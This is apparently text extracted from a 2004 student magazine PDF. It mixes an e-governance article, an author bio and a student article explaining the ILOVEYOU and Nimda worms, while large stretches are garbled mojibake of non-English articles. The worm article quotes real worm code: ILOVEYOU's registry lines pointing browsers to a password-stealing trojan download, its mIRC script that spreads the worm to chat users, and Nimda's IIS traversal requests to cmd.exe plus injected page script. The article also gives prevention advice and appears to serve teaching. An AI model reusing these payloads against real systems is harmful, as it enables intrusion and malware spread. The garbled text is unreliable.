AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

OgravekthornETHBETHHfrac14frac14ETH dETHkthornETHLTHORN Ograve_L jcmacrAEligOgraveethorn SOgraveZjETH^ETHethornZ OgravemthornETHL `lOgraveethorn jcdividea OgravekthornETHB _ETHHfrac14frac14ETHH`eTHORNthornLTHORN OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml HLeEcircthorn ^THORNLaTHORN]OcircETHOgraveethorn `ETHethorn=frac14c THORNaETH OgravemthornETHL ]ethornLETHethornOgravekthornETHBETHAlaquoTHORNAEligfrac14frac14ETH OgravejkTHORNthorn eTHORNthorn `otilde[THORNbthornETHaETH_ccedil aOcircbrvbarTHORNAEligfrac14ethorndOgravefrac12curren bthornETHa `eTHORNthornmthornlTHORN[ OgravekthornETHBETHHfrac14frac14ETH cETH[ouml Loacute[oumlTHORNcaEcircwTHORNethorn D`OgravedETHNOgraveethorn _THORNcUgrave[ Expert system HkTHORNthornbthornETHa EumlethornZ LeTHORNthornETHHfrac14frac14ETH

aEcircwTHORNcETH_ccedil aOcircbrvbarTHORNAEligVTHORNH Ograved`eTHORNthorn _EumlA`eTHORNthornOgraveahOgraveethorn _THORNSLEcirc hNtildeOotilde METH`ccedil MEcircAB Ograve_BETHHHkTHORNthorn qc THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn _THORNSethorn NtildehbrvbarTHORNAElig afOgraveethornSVTHORNf LETHdagraveOcircLEcirc jcETH^ETH_ LeTHORNthornETHHfrac14frac14ETH

About the author Jyotiranjan Hota is a softwareconsultant with an exposure to Indian and Internationalprojects He is a BE in Computer Science from NITRourkela and Executive PGP from Xavier Institute ofManagement Bhubaneswar He has around 11 yearsof experience in software consultancy teaching researchactivities and management consultancy He is fond ofwriting technical and general articles in newspapersand Journals of India and abroad His previousexperience includes World Bank funded Projects TataConsultancy Services and OCAC Currently he isassociated with KIIT Deemed University in Departmentof Computer Science and IT His area of strength liesin software engineering DBMS Object OrientedAnalysis and Design Software Project ManagementProfessional Ethics and Decision Support System

Page 39: oits-2004.pdf - created by pdfMachine from Broadgun …OITS-2004 2 Prizes were distributed by the Chief Guest, Bikramjit Maitra. In the senior category, the first, second and third

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc 